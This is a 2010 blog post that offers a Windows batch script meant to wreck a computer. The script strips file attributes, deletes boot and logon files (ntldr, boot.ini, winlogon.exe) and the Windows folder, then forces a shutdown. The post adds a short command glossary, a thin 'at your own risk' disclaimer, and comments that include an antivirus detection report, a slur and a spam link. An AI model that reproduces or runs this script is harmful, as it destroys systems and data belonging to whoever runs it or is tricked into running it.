Wednesday, October 27, 2010

Best way to Destroy Windows

The code I have pasted below is to be written in notepad. It is for to destroy files of windows resulting in corruption of files and loss of data so do it at your own risk. Any kind of damage of property I won`t be responsible.

@echo off
del C:\WINDOWS\system32\winlogon.exe
del C:\WINDOWS\system32\logonui.exe
del C:\WINDOWS\
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
@echo off
msg *message here
shutdown -s -t 8 -c "message here"

Save this as filename.bat(bat extension is must) and when you will execute in any computer it will destroy the files as mentioned in the code.

Do it at your own risk and don`t damage other`s property if you use this code to damage others property you are at your own risk I won`t be reponsible.

Want to know what above codes do??

  1. @echo off - This command will terminate your current prompt
  2. del - This command will delete the specified file
  3. attrib -r - This will make read only file rewritable
  4. attrib -s - This will make system film user defined
  5. attrib -h - This will unhide hidden files
  6. msg - Allows you to write message
  7. shutdown -s - This will shutdown the computer
  8. shutdown -t - Allows you to set time duration for shutting down
  9. shutdown -c - Allows you to add comment"

5 comments:

  1. This comment has been removed by the author.

    ReplyDelete
  2. Only way to stop a gaming addiction

    ReplyDelete
  3. Check out this blog nigga: https://randomfunstuffforadults.blogspot.com/

    Share on Social Media!

    ReplyDelete
  4. Eset saved me blocked this as BAT/KillWin.NAR

    ReplyDelete


Add Our GMore To Your Google
Show me